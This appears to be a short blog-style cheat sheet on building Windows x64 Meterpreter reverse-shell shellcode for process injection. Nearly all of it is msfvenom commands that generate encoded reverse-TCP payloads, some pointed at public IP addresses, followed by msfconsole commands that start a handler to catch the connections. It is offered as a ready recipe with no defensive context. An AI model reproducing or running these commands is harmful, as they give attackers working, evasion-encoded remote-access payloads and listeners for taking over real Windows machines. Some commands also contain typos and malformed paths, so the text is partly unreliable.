Shellcode

0

0day Windows/x64 Inject All Processes With Meterpreter Reverse Shell Shellcode

Thread Payload create
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.129 LPORT=1337 EXITFUNC=thread -f csharp

CreateRemoteThread Shellcode Injection difrent mathod

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b \x00\x0a\x0d

  1. Creating stageless shellcode with MSF-Venom

Shellcode-Downloader-CreateThread-Execution

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=45.91.92.112 LPORT=4444 -f raw -o raw.txt

Raw Formate payload metasploits

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o golu

Windows Encoded Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f raw > payload-name.exe

msfvenom -p windows/meterpreter_reverse_tcp LHOST=45.91.92.112 LPORT=4444 –platform windows -a x64 -f raw -o /root/Desktop

shellcode genrator

msfvenom -p windows/meterpreter_reverse_tcp LHOST=199.195.253.181 LPORT=4444 -f c -b \x00\x0a\x0d -o /root/Desktop/c.exe

Launch Console & Load Handler

msfconsole -qx “use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_tcp; set LHOST 45.91.92.112; set LPORT 4444; run”

Load Handler Only

use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_tcp
set LHOST 45.91.92.112
set LPORT 4444
run

LEAVE A REPLY

Please enter your comment!
Please enter your name here